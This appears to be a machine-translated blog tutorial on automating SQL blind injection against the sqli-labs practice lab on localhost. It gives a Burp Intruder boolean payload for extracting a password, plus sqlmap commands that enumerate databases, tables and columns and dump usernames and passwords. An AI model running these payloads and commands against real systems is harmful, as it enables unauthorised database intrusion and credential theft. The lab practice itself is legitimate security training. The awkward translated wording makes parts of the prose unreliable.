当前位置:网站首页>[tools run SQL blind note]
[tools run SQL blind note]
2022-07-03 04:38:00 【Black zone (rise)】
Catalog
One 、( Tools )burp Running blind injection
1.2、 Method 2 : Injection statement explosion
Two 、( Tools )sqlmap Run Boolean blind injection
First step : Detect whether there is injection
The second step : Burst database name
The third step : Burst database table name
One 、( Tools )burp Running blind injection
1.1、 Method 1 : Blast
After grabbing the bag , Send the request to "Intruder" modular
Set up 2 Payloads
1.2、 Method 2 : Injection statement explosion
Inject construct statements , Iterate
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
Two 、( Tools )sqlmap Run Boolean blind injection
2.1、 command :
-u Specify injection point
--dbs Run to the library name
--tables Running Watch name
--columns Run field name
--dump Enumerating data
Run out of the corresponding rear , Add... In turn -D Specify the library -T Designated table -C Specified field
2.2、 Use process :
First step : Detect whether there is injection
Basic operation
python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch
--batch Is to use the default settings
In fact, the environment has been swept out
You can add --dbms mysql 了
The second step : Burst database name
command
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-dbs --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
The third step : Burst database table name
command
python sqlmap.py -u url -D DB --tables --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step four : Pop field name
command :
sqlmap.py -u url -D DB -T TBL --columns --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step five : Burst data
command :
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Basic operation :
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
3、 ... and 、 recommend
【SQL Inject - No echo 】 Bull's blind note : principle 、 function 、 Use process
【SQL Inject - With echo 】DNS Request injection : principle 、 platform 、 Using process 、 To configure
边栏推荐
- Auman Galaxy new year of the tiger appreciation meeting was held in Beijing - won the double certification of "intelligent safety" and "efficient performance" of China Automotive Research Institute
- Kingbasees plug-in KDB of Jincang database_ date_ function
- [fairseq] error: typeerror:_ broadcast_ coalesced(): incompatible function arguments
- 2022 tea master (intermediate) examination questions and tea master (intermediate) examination skills
- 雇佣收银员(差分约束)
- Matplotlib -- save graph
- 关于开学的准备与专业认知
- 【SQL注入点】注入点出现位置、判断
- Function introduction of member points mall system
- What's wrong with SD card data damage? How to recover SD card data damage
猜你喜欢
2022 P cylinder filling test content and P cylinder filling simulation test questions
FISCO bcos zero knowledge proof Fiat Shamir instance source code
使用BENCHMARKSQL工具对KingbaseES执行测试时报错funcs sh file not found
Php+mysql registration landing page development complete code
Handling record of electric skateboard detained by traffic police
Leetcode simple question: check whether the array is sorted and rotated
2022 new examination questions for the main principals of hazardous chemical business units and examination skills for the main principals of hazardous chemical business units
Number of 1 in binary (simple difficulty)
联发科技2023届提前批IC笔试(题目)
Leetcode simple question: check whether the string is an array prefix
随机推荐
[fxcg] inflation differences will still lead to the differentiation of monetary policies in various countries
What functions need to be set after the mall system is built
The simple problem of leetcode: dismantling bombs
How to choose cross-border e-commerce multi merchant system
跨境电商多商户系统怎么选
After job hopping at the end of the year, I interviewed more than 30 companies in two weeks and finally landed
[dynamic programming] subsequence problem
Number of 1 in binary (simple difficulty)
Truncated sentences of leetcode simple questions
Prefix and (continuously updated)
BMZCTF simple_ pop
Number of uniform strings of leetcode simple problem
Auman Galaxy new year of the tiger appreciation meeting was held in Beijing - won the double certification of "intelligent safety" and "efficient performance" of China Automotive Research Institute
Kubernetes source code analysis (I)
RSRS index timing and large and small disc rotation
2022 chemical automation control instrument examination summary and chemical automation control instrument certificate examination
一名外包仔的2022年中总结
Design and implementation of JSP logistics center storage information management system
[fxcg] market analysis today
关于开学的准备与专业认知